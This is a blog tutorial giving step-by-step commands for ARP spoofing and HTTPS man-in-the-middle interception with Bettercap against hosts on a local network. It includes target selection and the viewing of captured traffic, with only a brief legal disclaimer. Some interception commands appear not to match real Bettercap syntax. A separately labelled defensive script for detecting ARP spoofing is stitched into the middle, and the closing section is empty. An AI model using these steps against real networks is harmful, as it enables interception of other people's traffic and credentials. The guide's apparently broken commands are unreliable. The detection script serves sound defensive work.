Blog | G5 Cyber Security

Bettercap: ARP Spoofing & HTTPS Interception

TL;DR

This guide shows you how to use Bettercap to perform ARP spoofing (man-in-the-middle attack) and intercept HTTPS traffic. Warning: This is for educational purposes only. Performing these actions on networks you don’t own or have permission to test is illegal.

Prerequisites

1. Identify Your Target Network

First, you need to know the network interface you’ll be using and the target IP range.

  1. Find your network interface:
    ip addr

    Look for an interface like wlan0 (wireless) or eth0 (wired).

  2. Identify the gateway IP address. This is usually your router.
    ip route | grep default

    The output will show something like default via 192.168.1.1 dev wlan0 proto dhcp metric 200, meaning the gateway IP is 192.168.1.1.

  3. Determine the target IP range. This could be something like 192.168.1.1-192.168.1.254 if you want to target all devices on your network (excluding the gateway).

2. Perform ARP Spoofing

ARP spoofing redirects traffic intended for another device through your machine.

  1. Start Bettercap in interactive mode:
    sudo bettercap -iface wlan0

    Replace wlan0 with your network interface.

  2. Enable ARP spoofing:
    net.recon on

    This will scan the network for devices.

    arp.spoof on

    By default, Bettercap spoofs the gateway IP address. You can specify targets using:

    arp.spoof 192.168.1.10 192.168.1.20
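Seen from the defending side, the redirection described in this section shows up in a victim's neighbour table: the gateway IP resolves to a MAC address that differs from the router's real one and that usually also belongs to another host. The following is an added example, not part of the original guide. It parses `ip neigh show` output and flags both conditions. The sample table and the baseline MAC are constructed, and the function names are hypothetical.

```python
"""Flag signs of ARP spoofing in `ip neigh show` output (added defensive example)."""
import re
from collections import defaultdict

# Matches resolved IPv4 entries, e.g.:
#   192.168.1.1 dev wlan0 lladdr aa:bb:cc:dd:ee:ff REACHABLE
# FAILED/INCOMPLETE entries carry no lladdr and are skipped.
NEIGH_RE = re.compile(
    r"^(?P<ip>\d+\.\d+\.\d+\.\d+)\s+dev\s+\S+\s+"
    r"lladdr\s+(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})\b",
    re.IGNORECASE,
)

# Constructed sample: the gateway and 192.168.1.10 share one MAC address.
SAMPLE = """\
192.168.1.1 dev wlan0 lladdr 02:00:00:aa:00:10 REACHABLE
192.168.1.10 dev wlan0 lladdr 02:00:00:aa:00:10 STALE
192.168.1.20 dev wlan0 lladdr 02:00:00:aa:00:20 REACHABLE
192.168.1.30 dev wlan0  FAILED
"""

def parse_neigh(text):
    """Return {ip: mac} for IPv4 neighbours with a resolved MAC."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m["ip"]] = m["mac"].lower()
    return table

def find_spoofing(table, gateway_ip, known_gateway_mac=None):
    """Return findings about the gateway entry in a neighbour table."""
    findings = []
    gw_mac = table.get(gateway_ip)
    # Check 1: gateway MAC differs from a baseline recorded on a trusted network state.
    if known_gateway_mac and gw_mac and gw_mac != known_gateway_mac.lower():
        findings.append(f"gateway {gateway_ip} MAC is {gw_mac}, expected {known_gateway_mac.lower()}")
    # Check 2: another IP shares the gateway's MAC. Limiting this to the gateway
    # avoids noise from hosts that legitimately own several addresses.
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    if gw_mac and len(by_mac[gw_mac]) > 1:
        others = sorted(ip for ip in by_mac[gw_mac] if ip != gateway_ip)
        findings.append(f"gateway {gateway_ip} shares MAC {gw_mac} with {', '.join(others)}")
    return findings

if __name__ == "__main__":
    for finding in find_spoofing(parse_neigh(SAMPLE), "192.168.1.1", "02:00:00:aa:00:01"):
        print("ALERT:", finding)
```

On a live host, feed it the output of `ip neigh show` and the gateway address reported by `ip route | grep default`.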

3. Intercept HTTPS Traffic

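Intercepting HTTPS requires the intercepting machine to present its own certificate (here, a self-signed one) so that it can decrypt the traffic. Because a self-signed certificate is not issued by a trusted CA, a client that validates certificates will show a warning or refuse the connection.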

  1. Generate an SSL certificate:
    ssl.cert add /path/to/your/certificate.pem

    You’ll need to create a certificate.pem file first (e.g., using OpenSSL). A simple example command is:

    openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

  2. Enable HTTPS interception:
    ssl.mitm on

  3. Filter for specific traffic (optional):
    net.filter add host 192.168.1.10 port 80,443

    This will only show traffic to/from the IP address 192.168.1.10 on ports 80 and 443.

  4. View intercepted data:
    Bettercap displays captured packets in real-time. Look for HTTP and HTTPS requests in the output.

4. Important Considerations
